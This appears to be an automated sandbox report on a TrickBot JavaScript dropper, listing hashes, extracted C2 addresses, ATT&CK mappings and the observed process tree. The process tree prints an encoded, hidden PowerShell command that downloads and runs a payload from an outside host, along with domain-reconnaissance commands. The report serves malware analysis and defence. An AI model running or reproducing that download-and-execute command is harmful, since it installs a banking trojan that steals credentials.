trickbot | 185ac740c3516c3a6461b15d9b94047d6b48c0bd2184a03087890b573ace2884

General

Target

4524.js
Size

344KB
MD5

1e15caad81dbf43c24c3517c6658c138
SHA1

5a0e8e9cdc2a8b5a575c8f55674fa675ff49eef2
SHA256

185ac740c3516c3a6461b15d9b94047d6b48c0bd2184a03087890b573ace2884
SHA512

dd094e3e20987d6951da8e7069bff408b09293a6c67077a77d6721b801754a2cf4bee895b67bac4a65d0a0f49a57be180b059f4334d9ecd825497c6d07da00fd

Score

10^/10

trickbot rob109 banker spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://109.248.201.26/lovemetertok.php

Extracted

Family

trickbot

Version

100018

Botnet

rob109

C2

38.110.103.124:443

185.56.76.28:443

204.138.26.60:443

60.51.47.65:443

74.85.157.139:443

68.69.26.182:443

38.110.103.136:443

38.110.103.18:443

138.34.28.219:443

185.56.76.94:443

217.115.240.248:443

24.162.214.166:443

80.15.2.105:443

154.58.23.192:443

38.110.100.104:443

45.36.99.184:443

185.56.76.108:443

185.56.76.72:443

138.34.28.35:443

97.83.40.67:443

Attributes

autorun
Name:pwgrabb
Name:pwgrabc

ecc_pubkey.base64

Signatures

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 3 IoCs

Processes:

powershell.execmd.exe

flow pid process

5 1296 powershell.exe
6 1296 powershell.exe
62 860 cmd.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1696 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

37 ip.anysrc.net
Drops file in System32 directory 1 IoCs

Processes:

wermgr.exe

description ioc process

File created C:\Windows\system32\cn\eihmful.txt wermgr.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 2 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exe

pid process

1856 net.exe
1144 net.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

1404 ipconfig.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.execmd.execmd.execmd.exe

pid process

1296 powershell.exe
1296 powershell.exe
1956 cmd.exe
1364 cmd.exe
860 cmd.exe
1364 cmd.exe

flow	pid	process
5	1296	powershell.exe
6	1296	powershell.exe
62	860	cmd.exe

pid	process
1696	rundll32.exe

flow	ioc
37	ip.anysrc.net

description	ioc	process
File created	C:\Windows\system32\cn\eihmful.txt	wermgr.exe

pid	process
1856	net.exe
1144	net.exe

pid	process
1404	ipconfig.exe

pid	process
1296	powershell.exe
1296	powershell.exe
1956	cmd.exe
1364	cmd.exe
860	cmd.exe
1364	cmd.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exewermgr.execmd.execmd.exe

description	pid	process
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1336	wermgr.exe
Token: SeDebugPrivilege	1956	cmd.exe
Token: SeDebugPrivilege	1364	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

wscript.execmd.exepowershell.exerundll32.exerundll32.exewermgr.exe

description	pid	process	target process
PID 592 wrote to memory of 1520	592	wscript.exe	cmd.exe
PID 592 wrote to memory of 1520	592	wscript.exe	cmd.exe
PID 592 wrote to memory of 1520	592	wscript.exe	cmd.exe
PID 1520 wrote to memory of 1296	1520	cmd.exe	powershell.exe
PID 1520 wrote to memory of 1296	1520	cmd.exe	powershell.exe
PID 1520 wrote to memory of 1296	1520	cmd.exe	powershell.exe
PID 1296 wrote to memory of 564	1296	powershell.exe	rundll32.exe
PID 1296 wrote to memory of 564	1296	powershell.exe	rundll32.exe
PID 1296 wrote to memory of 564	1296	powershell.exe	rundll32.exe
PID 564 wrote to memory of 1696	564	rundll32.exe	rundll32.exe
PID 564 wrote to memory of 1696	564	rundll32.exe	rundll32.exe
PID 564 wrote to memory of 1696	564	rundll32.exe	rundll32.exe
PID 564 wrote to memory of 1696	564	rundll32.exe	rundll32.exe
PID 564 wrote to memory of 1696	564	rundll32.exe	rundll32.exe
PID 564 wrote to memory of 1696	564	rundll32.exe	rundll32.exe
PID 564 wrote to memory of 1696	564	rundll32.exe	rundll32.exe
PID 1696 wrote to memory of 1160	1696	rundll32.exe	cmd.exe
PID 1696 wrote to memory of 1160	1696	rundll32.exe	cmd.exe
PID 1696 wrote to memory of 1160	1696	rundll32.exe	cmd.exe
PID 1696 wrote to memory of 1160	1696	rundll32.exe	cmd.exe
PID 1696 wrote to memory of 1336	1696	rundll32.exe	wermgr.exe
PID 1696 wrote to memory of 1336	1696	rundll32.exe	wermgr.exe
PID 1696 wrote to memory of 1336	1696	rundll32.exe	wermgr.exe
PID 1696 wrote to memory of 1336	1696	rundll32.exe	wermgr.exe
PID 1696 wrote to memory of 1336	1696	rundll32.exe	wermgr.exe
PID 1696 wrote to memory of 1336	1696	rundll32.exe	wermgr.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe
PID 1336 wrote to memory of 1956	1336	wermgr.exe	cmd.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\4524.js
1⤵
- Suspicious use of WriteProcessMemory
PID:592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
2⤵
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\gGOAuihadTSQnZB.bin StartW
4⤵
- Suspicious use of WriteProcessMemory
PID:564

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\gGOAuihadTSQnZB.bin StartW
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
6⤵
PID:1160

C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:860

C:\Windows\system32\cmd.exe
/c ipconfig /all
8⤵
PID:564

C:\Windows\system32\ipconfig.exe
ipconfig /all
9⤵
- Gathers network information
PID:1404

C:\Windows\system32\cmd.exe
/c net config workstation
8⤵
PID:1504

C:\Windows\system32\net.exe
net config workstation
9⤵
PID:1572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
10⤵
PID:1168

C:\Windows\system32\cmd.exe
/c net view /all
8⤵
PID:672

C:\Windows\system32\net.exe
net view /all
9⤵
- Discovers systems in the same network
PID:1856

C:\Windows\system32\cmd.exe
/c net view /all /domain
8⤵
PID:1108

C:\Windows\system32\net.exe
net view /all /domain
9⤵
- Discovers systems in the same network
PID:1144

C:\Windows\system32\cmd.exe
/c nltest /domain_trusts
8⤵
PID:2036

C:\Windows\system32\nltest.exe
nltest /domain_trusts
9⤵
PID:1812

C:\Windows\system32\cmd.exe
/c nltest /domain_trusts /all_trusts
8⤵
PID:1796

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
9⤵
PID:1176

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\gGOAuihadTSQnZB.bin
MD5
7cbf4114f95a04e958951d1237914e3d

SHA1
3814ac9bfba6b05f69d4eace5606bb327f3b0986

SHA256
e9d72af7dee0e7785d15a1731734560fc8e85b4aeebe25a9f11ff716b1b7b7c9

SHA512
bcb0d91405c368f0dd7a8b63916b62eab52b4f38e995256d78d78b063f05e91fabf58010b92d1bb93aaab784c4658610414bfbb6ebc51c8fb14a7c5670db62d4

Download Submit
\Users\Admin\AppData\Local\Temp\gGOAuihadTSQnZB.bin
MD5
7cbf4114f95a04e958951d1237914e3d

SHA1
3814ac9bfba6b05f69d4eace5606bb327f3b0986

SHA256
e9d72af7dee0e7785d15a1731734560fc8e85b4aeebe25a9f11ff716b1b7b7c9

SHA512
bcb0d91405c368f0dd7a8b63916b62eab52b4f38e995256d78d78b063f05e91fabf58010b92d1bb93aaab784c4658610414bfbb6ebc51c8fb14a7c5670db62d4

Download Submit
memory/564-102-0x0000000000000000-mapping.dmp

Download
memory/564-70-0x0000000000000000-mapping.dmp

Download
memory/672-107-0x0000000000000000-mapping.dmp

Download
memory/860-99-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/860-98-0x0000000000000000-mapping.dmp

Download
memory/1108-109-0x0000000000000000-mapping.dmp

Download
memory/1144-110-0x0000000000000000-mapping.dmp

Download
memory/1168-106-0x0000000000000000-mapping.dmp

Download
memory/1176-114-0x0000000000000000-mapping.dmp

Download
memory/1296-68-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/1296-66-0x000000001AC20000-0x000000001AC22000-memory.dmp

Filesize
8KB

Download
memory/1296-62-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmp

Filesize
8KB

Download
memory/1296-67-0x000000001AC24000-0x000000001AC26000-memory.dmp

Filesize
8KB

Download
memory/1296-61-0x0000000000000000-mapping.dmp

Download
memory/1296-65-0x00000000023E0000-0x00000000023E1000-memory.dmp

Filesize
4KB

Download
memory/1296-64-0x000000001ACA0000-0x000000001ACA1000-memory.dmp

Filesize
4KB

Download
memory/1296-63-0x0000000002040000-0x0000000002041000-memory.dmp

Filesize
4KB

Download
memory/1296-69-0x000000001B810000-0x000000001B811000-memory.dmp

Filesize
4KB

Download
memory/1336-87-0x0000000000060000-0x0000000000088000-memory.dmp

Filesize
160KB

Download
memory/1336-88-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/1336-86-0x0000000000000000-mapping.dmp

Download
memory/1364-94-0x0000000000000000-mapping.dmp

Download
memory/1404-103-0x0000000000000000-mapping.dmp

Download
memory/1504-104-0x0000000000000000-mapping.dmp

Download
memory/1520-60-0x0000000000000000-mapping.dmp

Download
memory/1572-105-0x0000000000000000-mapping.dmp

Download
memory/1696-80-0x0000000000950000-0x0000000000987000-memory.dmp

Filesize
220KB

Download
memory/1696-73-0x0000000075A71000-0x0000000075A73000-memory.dmp

Filesize
8KB

Download
memory/1696-85-0x00000000002E1000-0x00000000002E3000-memory.dmp

Filesize
8KB

Download
memory/1696-84-0x00000000002F0000-0x0000000000301000-memory.dmp

Filesize
68KB

Download
memory/1696-82-0x00000000002A0000-0x00000000002D8000-memory.dmp

Filesize
224KB

Download
memory/1696-83-0x0000000000AD0000-0x0000000000B14000-memory.dmp

Filesize
272KB

Download
memory/1696-72-0x0000000000000000-mapping.dmp

Download
memory/1696-78-0x00000000004F0000-0x0000000000529000-memory.dmp

Filesize
228KB

Download
memory/1696-75-0x00000000004B0000-0x00000000004EB000-memory.dmp

Filesize
236KB

Download
memory/1796-113-0x0000000000000000-mapping.dmp

Download
memory/1812-112-0x0000000000000000-mapping.dmp

Download
memory/1856-108-0x0000000000000000-mapping.dmp

Download
memory/1956-93-0x0000000000060000-0x0000000000061000-memory.dmp

Filesize
4KB

Download
memory/1956-89-0x0000000000000000-mapping.dmp

Download
memory/2036-111-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads